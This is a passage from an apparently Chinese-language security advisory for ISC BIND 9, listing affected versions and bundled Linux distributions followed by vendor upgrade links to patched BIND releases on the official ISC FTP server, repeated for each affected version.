S.u.S.E. Linux 8.0\r\n+ S.u.S.E. Linux 7.3 sparc\r\n+ S.u.S.E. Linux 7.3 ppc\r\n+ S.u.S.E. Linux 7.3 i386\r\n+ S.u.S.E. Linux 7.3\r\nISC BIND 9.1.2\r\n+ Conectiva Linux 7.0\r\n+ S.u.S.E. Linux 7.2 i386\r\n+ S.u.S.E. Linux 7.2\r\nISC BIND 9.1.1\r\n+ MandrakeSoft Linux Mandrake 8.0 ppc\r\n+ MandrakeSoft Linux Mandrake 8.0\r\nISC BIND 9.1\r\n+ Caldera OpenUnix 8.0\r\n+ HP Secure OS software for Linux 1.0\r\n+ RedHat Linux 7.1 ia64\r\n+ RedHat Linux 7.1 i386\r\n+ RedHat Linux 7.1 alpha\r\n+ RedHat Linux 7.1\r\n+ S.u.S.E. Linux 7.1 x86\r\n+ S.u.S.E. Linux 7.1 sparc\r\n+ S.u.S.E. Linux 7.1 ppc\r\n+ S.u.S.E. Linux 7.1 alpha\r\n+ S.u.S.E. Linux 7.1\r\nISC BIND 9.0.1\r\nISC BIND 9.0\r\n+ S.u.S.E. Linux 7.0 sparc\r\n+ S.u.S.E. Linux 7.0 ppc\r\n+ S.u.S.E. Linux 7.0 i386\r\n+ S.u.S.E. Linux 7.0 alpha\r\n+ S.u.S.E. Linux 7.0\r\nISC BIND 9.5.1b1\r\nISC BIND 9.5.0b2\r\nISC BIND 9.5.0b1\r\nISC BIND 9.5.0a7\r\nISC BIND 9.5.0a6\r\nISC BIND 9.5.0a5\r\nISC BIND 9.5.0a4\r\nISC BIND 9.5.0a3\r\nISC BIND 9.5.0a3\r\nISC BIND 9.4.3b2\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u5347\u7ea7\u7a0b\u5e8f\uff1a\r\nISC BIND 9.5.1b1\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.5.0a3\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.5.0b2\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.5.0a3\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.4.3b2\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.5.0a4\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.5.0b1\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.5.0a7\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.5.0a5\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.5.0a6\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.0\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.0.1\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.1\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.1.1\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.1.2\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.1.3\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.2\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.2.1\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.2.2\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.2.3\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.2.4\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.2.5\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.2.6 -P2\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.2.6\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.2.6 -P1\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.2.7 rc3\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.2.7\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.2.7 rc2\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.2.7 b1\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.2.7 rc1\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.2.8\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.3\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.3.1\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.3.2 -P1\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.3.2 -P2\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.3.2\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.3.3\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.3.3 rc1\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.3.3 rc3\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.3.3 rc1\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.3.3 rc2\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.3.3 b1\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.3.3 b\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.3.4\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.3.5 P2-W1\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.3.5 P2\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.3.5 P2-W2\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.3.5\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.3.6 P1\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.3.6\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.4 b4\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.4 rc2\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.4 rc1\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.4 a1\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.4 a2\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.4 a5\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.4 a4\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.4 a6\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.4 b2\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.4 b3\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC bind-9.5.1-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz\r\nISC bind-9.6.1-P1.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz\r\nISC BIND 9.4 a3\r\nISC bind-9.4.3-P3.tar.gz\r\nftp://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz\r\nISC 